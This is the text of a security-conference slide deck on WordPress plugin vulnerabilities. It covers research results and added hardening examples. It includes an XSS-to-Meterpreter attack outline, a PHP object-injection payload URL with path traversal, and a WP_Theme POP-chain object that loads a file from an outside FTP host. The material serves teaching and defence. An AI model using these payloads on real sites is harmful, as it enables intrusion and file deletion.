The State of Security of WordPress (plugins)
Yorick Koster
Contents
• About Me
• Summer of Pwnage
• State of Security
• Pwning WordPress
About Me
• Yorick Koster
• Co-Founder Securify, Proactive Software Security / Build Security In
• ~15 years doing software security
• Uncovered vulnerabilities in various products
  – Internet Explorer, Office, .NET Framework, Adobe Reader, WordPress & more.
Summer of Pwnage
Summer of Pwnage
• Started as a joke
• Used Github to find Object Injection
• We didn't know how to run a con (still don't 😉)
Summer of Pwnage
• Month of WordPress hacking
• Meetup every week
• VM with WordPress & ~1000 plugins/themes
• For students & people with little experience
• ~25-30 active participants
• Resulted in 118 findings (5 Core)
https://www.sumofpwn.nl/advisories.html
https://twitter.com/sumofpwn
Summer of Pwnage: Results
• Cross-Site Scripting 66%
• Cross-Site Request Forgery 12%
• PHP Object Injection 8%
• Other 14%
  – (Remote) Code Execution 4%
  – Local File Inclusion 3%
  – Denial of Service 3%
  – Authentication Bypass 2%
  – Misc 2%
Summer of XSS 😎
Summer of Pwnage: Results
(chart: breakdown into CSRF, Pre-auth and Privilege escalation; slices of 65%, 23% and 12%)
Summer of Pwnage: Results
(bar chart: findings by status, Fixed / Open / No fix; axis 0 to 80)
Summer of Pwnage: Media coverage
42
Summer of Pwnage: Observations
• Focus on low hanging fruit
• Grep is king
• Getting stuff fixed is hard
• Security knowledge of plugin writers is low
WordPress (Plugins) State of Security
WordPress Security: Core
• WordPress is blog software with CMS features
• Powers ~27% of all websites (reportedly)
• Focus on who can edit which content
  – Content is either published or not*
  – Media can be enumerated*
WordPress Security: Core
• Seems like they've learned the hard way
• Core is relatively secure (appear to know their stuff)
  – Filtering/validation
  – Anti-CSRF (nonces)
  – Automatic updates 🙂
• (Legacy) issues
  – No prepared statements
  – Salted MD5 passwords
  – Login brute force
  – Not designed for CSP
WordPress Security: Plugins
• Vulnerabilities in only ~100 plugins of 1000 popular plugins (10%)
• Keep in mind:
  – Limited (spare) time
  – Focus on low hanging fruit
WordPress Security: Plugins
• Some APIs are secure by default
  – E.g., prevent SQLi
• Some are not
  – Output encoding
  – CSRF protection
• High number of XSS & CSRF issues

get_post( int|WP_Post|null $post = null, string $output = OBJECT, string $filter = 'raw' )
Retrieves post data given a post ID or post object.
    function column_default($item, $column_name){
        $item = apply_filters('ull-output-data', $item);
        //unset existing filter and pagination
        $args = wp_parse_args( parse_url($_SERVER["REQUEST_URI"], PHP_URL_QUERY) );
        unset($args['filter']);
        unset($args['paged']);
        switch($column_name){
            case 'id':
            case 'uid':
            case 'time':
            case 'data':
                return $item[$column_name]; // logged value returned unescaped into the table HTML
            case 'image':
                $user = new WP_User( $item['uid'] );
                $user_email = $user->user_email;
                return get_avatar( $user_email, 60 );
            case 'user_email':
                return $item[$column_name]; // unescaped
            case 'ip':
                return $item[$column_name]; // unescaped
        }
    }
WordPress Security: Plugins (XSS)
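How the two slides above fit together in code, as an added example that is not the talk's or the plugin's own: the column_default() method with its output escaped, a row action protected by a nonce, and the handler using the secure-by-default $wpdb->prepare(). The class, table, hook and capability names are assumptions; the 'ull-output-data' filter and the column names are the ones from the snippet.

```php
<?php
// Added example, not from the talk or the plugin shown above. Assumes a plugin
// list table; WP_List_Table must be loaded explicitly outside core admin screens.
if ( ! class_exists( 'WP_List_Table' ) ) {
    require_once ABSPATH . 'wp-admin/includes/class-wp-list-table.php';
}
class Example_Log_Table extends WP_List_Table {
    public function column_default( $item, $column_name ) {
        $item = apply_filters( 'ull-output-data', $item );
        switch ( $column_name ) {
            case 'id':
            case 'uid':
            case 'time':
            case 'data':
            case 'user_email':
            case 'ip':
                // Log rows hold attacker-influenced strings (user agents,
                // usernames, referers). Escape on output instead of returning raw.
                return esc_html( $item[ $column_name ] );
            case 'image':
                $user = new WP_User( (int) $item['uid'] );
                return get_avatar( $user->user_email, 60 ); // markup built by core
            default:
                return '';
        }
    }
    // Row action whose URL carries a nonce bound to this row and this action.
    public function column_actions( $item ) {
        $id  = (int) $item['id'];
        $url = wp_nonce_url( add_query_arg( array( 'action' => 'delete', 'id' => $id ) ),
                             'example_delete_' . $id );
        return '<a href="' . esc_url( $url ) . '">' . esc_html__( 'Delete', 'example' ) . '</a>';
    }
}
// Handler: capability check, then nonce check, then a prepared statement.
function example_handle_delete() {
    if ( empty( $_GET['action'] ) || 'delete' !== $_GET['action'] || empty( $_GET['id'] ) ) {
        return;
    }
    $id = (int) $_GET['id'];
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    check_admin_referer( 'example_delete_' . $id ); // dies on a missing or bad nonce
    global $wpdb;
    // prepare() binds the value; the table name is built from the trusted prefix.
    $wpdb->query( $wpdb->prepare( "DELETE FROM {$wpdb->prefix}example_log WHERE id = %d", $id ) );
}
add_action( 'admin_init', 'example_handle_delete' );
```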
WordPress Security: Plugins
"We're sorry for the inconvenience, we will fix this right away."
"We will need to have access to your ftp information so we can login and look into this, can you please provide us with login credentials?"
"Is there a reason a WordPress nonce isn't sufficient for this security concern?"
"Can you at least explain to me the damage it could create?"
"Can you help me understand why json_encode/json_decode is superior to using serialize/unserialize?"
"[…] is called by a WordPress add_menu_page, in theory it is WordPress that has filtered the input when calling the page."
WordPress Security: Summary
• WordPress Core is relatively secure
• Core has known (legacy) issues
• Lots of insecure plugins
  – Dangerous APIs
  – Low security awareness
  – Mostly XSS & CSRF
Pwning WordPress

Pwning WordPress: Cross-Site Scripting
• Inject XSS payload
• Wait for admin to visit vulnerable page
• Run 2nd stage JavaScript payload to:
  – modify PHP file;
  – visit PHP file;
  – run PHP Meterpreter client.
Pwning WordPress: Hardening
• If you don't need the editor, disable it
• More hardening:
https://codex.wordpress.org/Hardening_WordPress
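Disabling the editor in practice, as an added example that is not from the talk or the Codex page: the wp-config.php constants that remove the theme/plugin editor (the weak default beside the hardened setting), plus a must-use plugin that denies the file-editing capabilities and logs attempts to reach the editor screens. File names, the capability list and the log format are assumptions.

```php
<?php
// Added example (not from the talk or the Codex). Two files shown in one block:
// the wp-config.php constants and a must-use plugin. Names are assumptions.

// ---- wp-config.php ----
// Weak (the behaviour when the constant is absent): every administrator gets
// the editor, so script running in an admin session can write PHP into a theme.
// define( 'DISALLOW_FILE_EDIT', false );

// Hardened: core maps edit_files/edit_themes/edit_plugins to do_not_allow and
// drops the editor screens. DISALLOW_FILE_MODS additionally blocks plugin and
// theme installs/updates from the dashboard; enable it only when updates are
// deployed another way.
define( 'DISALLOW_FILE_EDIT', true );
// define( 'DISALLOW_FILE_MODS', true );

// ---- wp-content/mu-plugins/deny-file-edit.php ----
// Defence in depth: deny the capabilities even if the constant is dropped, and
// record requests that reach the editor screens so a hijacked admin session
// leaves a trace in the PHP error log.
add_filter( 'map_meta_cap', function ( $caps, $cap, $user_id ) {
    $file_caps = array( 'edit_files', 'edit_themes', 'edit_plugins' );
    if ( ! in_array( $cap, $file_caps, true ) ) {
        return $caps;
    }
    // The admin menu also checks these caps on every page load, so only log
    // when the request itself targets an editor screen.
    $script = isset( $_SERVER['SCRIPT_NAME'] ) ? basename( $_SERVER['SCRIPT_NAME'] ) : '';
    if ( in_array( $script, array( 'theme-editor.php', 'plugin-editor.php' ), true ) ) {
        error_log( sprintf(
            'deny-file-edit: user %d requested %s via %s from %s',
            (int) $user_id,
            $cap,
            $script,
            isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-'
        ) );
    }
    return array( 'do_not_allow' );
}, 10, 3 );
```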
Pwning WordPress: PHP Object Injection

    <?php
    class Example1 {
        public $cache_file;

        function __construct() {
            // some PHP code...
        }

        function __destruct() {
            $file = "/var/www/cache/tmp/{$this->cache_file}";
            if (file_exists($file)) @unlink($file);
        }
    }

    // some PHP code...
    $user_data = unserialize($_GET['data']);
    // some PHP code...
    ?>

http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}

OWASP example
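The OWASP example with the unsafe call beside two safer alternatives, added here and not part of the talk or of OWASP's material; it also answers the plugin author's question above about json_decode versus unserialize. The Example1 class is the one from the snippet; the payload string and contains_serialized_object() are constructed for this example.

```php
<?php
// Added example (not from the talk or OWASP): the Example1 class from the
// OWASP snippet, with the vulnerable unserialize() beside two safer options.
// The payload string and contains_serialized_object() are constructed here.
class Example1 {
    public $cache_file;
    function __destruct() {
        // Side effect that runs for any Example1 the deserializer builds.
        $file = "/var/www/cache/tmp/{$this->cache_file}";
        if (file_exists($file)) @unlink($file);
    }
}

// Same shape as the data= parameter on the slide, kept inline so this runs offline.
$payload = 'O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}';

// 1. Vulnerable: unserialize() instantiates whatever class the stream names,
//    so Example1::__destruct() runs with an attacker-chosen $cache_file.
//    (Left commented out so this script does not touch the file system.)
// $user_data = unserialize($payload);

// 2. Safer (PHP >= 7.0): with allowed_classes => false every object in the
//    stream becomes __PHP_Incomplete_Class, so no constructor, destructor,
//    __wakeup or __toString of the real class is ever reached.
$data = unserialize($payload, ['allowed_classes' => false]);
var_dump($data instanceof Example1);   // the real class is never instantiated
var_dump(get_class($data));

// 3. Preferred for untrusted input: JSON cannot describe PHP objects at all,
//    which is why json_encode/json_decode beats serialize/unserialize here.
$safe = json_decode(json_encode(['cache_file' => 'page.html']), true);
var_dump(is_array($safe));

// Stop-gap for an unserialize() you cannot remove yet: reject input that
// carries a serialized object (O:) or custom-serialized (C:) marker, at the
// top level or nested inside an array.
function contains_serialized_object(string $s): bool
{
    return (bool) preg_match('/(^|[;{])[OC]:\d+:"/', $s);
}
var_dump(contains_serialized_object($payload));             // object payload
var_dump(contains_serialized_object('a:1:{i:0;s:1:"x";}')); // plain array
```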
Pwning WordPress: PHP Object Injection
• Find the right target
• Direct:
  – __destruct()
  – __wakeup()
• Indirect:
  – __toString()
  – __call()
  – __set()
  – __get()
• Autoloading:
  – spl_autoload_register()
Pwning WordPress: PHP Object Injection
• No easily exploitable class in WordPress
• Find the correct POP chain
• POP chain presented by Sam Thomas
http://www.slideshare.net/_s_n_t/php-unserialization-vulnerabilities-what-are-we-missing
• Attack still works in latest version (4.6.1)
• Uses WP_Theme::__toString() as start point
Pwning WordPress: PHP Object Injection
WP_Theme: __toString() → display() → load_textdomain() → load_theme_textdomain()
l10n.php: load_textdomain() → is_readable() → import MO file
Pwning WordPressPHPObjectInjection• Finalobject
WP_Theme Object(
[theme_root:WP_Theme:private] => ftp://anonymous:[email protected][headers:WP_Theme:private] => Array
([Name] => foo[TextDomain] => default
)[stylesheet:WP_Theme:private] => foobar
)